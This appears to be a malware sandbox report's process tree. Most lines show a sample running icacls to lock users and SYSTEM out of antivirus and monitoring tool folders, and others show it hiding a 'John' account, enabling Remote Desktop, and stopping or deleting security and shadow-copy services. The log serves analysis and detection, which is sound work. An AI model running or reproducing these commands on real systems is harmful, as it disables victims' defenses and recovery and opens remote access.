C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)4⤵PID:6716
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)5⤵PID:6808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)4⤵PID:6840
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)5⤵PID:4600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)4⤵PID:3656
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)4⤵PID:5144
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)4⤵PID:5916
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵PID:5884
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)5⤵PID:4892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)4⤵PID:1332
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵PID:3276
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵PID:4348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)4⤵PID:1804
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵PID:2876
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)5⤵PID:1096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)4⤵PID:5292
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2760
-
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)4⤵PID:4412
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)5⤵PID:2540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)4⤵PID:4536
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)4⤵PID:6092
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)4⤵PID:6096
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f4⤵PID:3224
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f5⤵PID:2856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f4⤵PID:6320
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f5⤵PID:5584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f4⤵PID:2288
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f5⤵PID:4676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)4⤵PID:5072
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵PID:6152
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵PID:6324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)4⤵PID:3684
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵PID:6372
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)4⤵PID:6416
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)4⤵PID:1408
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)5⤵PID:6380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)4⤵PID:1548
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6616
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)4⤵PID:3260
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)5⤵PID:3596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)4⤵PID:6580
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)5⤵PID:5972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)4⤵PID:2644
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)4⤵PID:6224
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6340
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)4⤵PID:6220
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)5⤵PID:4248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)4⤵PID:1216
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)4⤵PID:6284
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)5⤵PID:6124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)4⤵PID:2444
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)4⤵PID:448
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)5⤵PID:5716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)4⤵PID:2832
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)4⤵PID:4476
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)4⤵PID:1928
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)5⤵PID:672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)4⤵PID:1788
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)5⤵PID:2880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)4⤵PID:1648
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)5⤵PID:6756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)4⤵PID:6864
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)4⤵PID:2188
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)5⤵PID:4280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)4⤵PID:2336
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)4⤵PID:6896
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)5⤵PID:7044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)4⤵PID:5460
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)4⤵PID:6444
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)4⤵PID:7160
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)5⤵PID:7072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)4⤵PID:5780
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)5⤵PID:6252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)4⤵PID:7052
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)5⤵PID:4472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)4⤵PID:5804
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)4⤵PID:5644
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)5⤵PID:7136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)4⤵PID:5704
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)4⤵PID:5636
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)4⤵PID:2592
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3656
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)4⤵PID:6188
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)4⤵PID:5040
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3048
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)5⤵PID:4748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)4⤵PID:2604
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)4⤵PID:2688
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:456
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)5⤵PID:1468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)4⤵PID:4632
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3276
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)5⤵PID:1032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)4⤵PID:4072
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)4⤵PID:1704
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)5⤵PID:1100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)4⤵PID:2628
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)5⤵PID:2680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)4⤵PID:6088
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)5⤵PID:4904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)4⤵PID:5788
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)4⤵PID:2132
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)4⤵PID:4052
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)5⤵PID:3224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)4⤵PID:5864
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)4⤵PID:1212
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)5⤵PID:6500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)4⤵PID:6072
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6232
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)5⤵PID:2932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)4⤵PID:6396
-
C:\Windows\system32\icacls.exeicacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)5⤵PID:4320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)4⤵PID:5028
-
C:\Windows\system32\icacls.exeicacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)4⤵PID:2452
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)5⤵PID:6820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)4⤵PID:6468
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GPU Temp" /deny "%username%":(OI)(CI)(F)4⤵PID:5720
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6572
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\GPU Temp" /deny "Admin":(OI)(CI)(F)5⤵PID:3708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\CPUID\HWMonitor" /deny "%username%":(OI)(CI)(F)4⤵PID:5580
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\CPUID\HWMonitor" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "%username%":(OI)(CI)(F)4⤵PID:6544
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\MSI\MSI Center" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\QuickCPU" /deny "%username%":(OI)(CI)(F)4⤵PID:6656
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6024
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\QuickCPU" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\NETGATE" /deny "%username%":(OI)(CI)(F)4⤵PID:5752
-
C:\Windows\system32\icacls.exeicacls "c:\program files\NETGATE" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Wise" /deny "%username%":(OI)(CI)(F)4⤵PID:6524
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Wise" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ReasonLabs" /deny "%username%":(OI)(CI)(F)4⤵PID:5492
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ReasonLabs" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny %username%:(OI)(CI)F4⤵PID:6048
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Programs\transmission /deny Admin:(OI)(CI)F5⤵
- Modifies file permissions
PID:5188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)F4⤵PID:3588
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5716
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)F5⤵
- Modifies file permissions
PID:6020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny %username%:(OI)(CI)F4⤵PID:3884
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny Admin:(OI)(CI)F5⤵
- Modifies file permissions
PID:6044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv4⤵PID:5340
-
C:\Windows\system32\sc.exesc delete swprv5⤵
- Launches sc.exe
PID:6332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice4⤵PID:5468
-
C:\Windows\system32\sc.exesc stop mbamservice5⤵
- Launches sc.exe
PID:5792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice4⤵PID:1760
-
C:\Windows\system32\sc.exesc stop bytefenceservice5⤵
- Launches sc.exe
PID:6756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice4⤵PID:948
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1648
-
-
C:\Windows\system32\sc.exesc delete bytefenceservice5⤵
- Launches sc.exe
PID:6196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice4⤵PID:5688
-
C:\Windows\system32\sc.exesc delete mbamservice5⤵
- Launches sc.exe
PID:6984
-
-
-
